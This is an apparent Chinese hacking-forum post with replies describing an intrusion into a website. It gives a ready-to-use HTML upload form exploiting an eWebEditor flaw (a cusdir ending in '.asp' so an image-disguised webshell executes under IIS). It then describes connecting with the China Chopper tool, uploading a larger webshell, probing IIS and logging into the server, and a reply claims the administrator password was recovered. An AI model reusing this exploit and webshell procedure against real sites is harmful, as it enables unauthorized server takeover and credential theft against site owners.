好吧 年前最后一站
目标站
扫目录扫出了一个
然后百度了一下 ewebeditor漏洞
利用以下代码 保存为1.html
<FORM encType=multipart/form-data method=post name=myform action=http://www.xxxx.cn/admin/ewebeditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp>
<Input style="WIDTH: 510px; HEIGHT: 18px" size=85 type=file name=uploadfile>
<Input value=upload type=submit> <BR></FORM
打开
1.html
上传一个图片合成马或是免杀小马(不然会出现乱码)
成功后看源文件
得到路径
http://www.xxxx.cn/uploadfile/Mr.DzY.asp/20130207021537820.jpg
菜刀连接
传大马就不用说了 用ASPX马探测IIS
然后登陆服务器
结束 过年了大家好好过年 多陪陪家人 明年我们继续 传错图了 ...这个网站是我发出去的啊:funk::funk::funk: 你是孤风? 还是他发给别人了:L 楼上的亮点啦。。。 擦= = 传大马就不用说了 用ASPX马探测IIS 怎么就没了... 冰刀 发表于 2013-2-8 23:06 static/image/common/back.gif
擦= = 传大马就不用说了 用ASPX马探测IIS 怎么就没了...
直接探测出administrator的密码来了
页:
[1]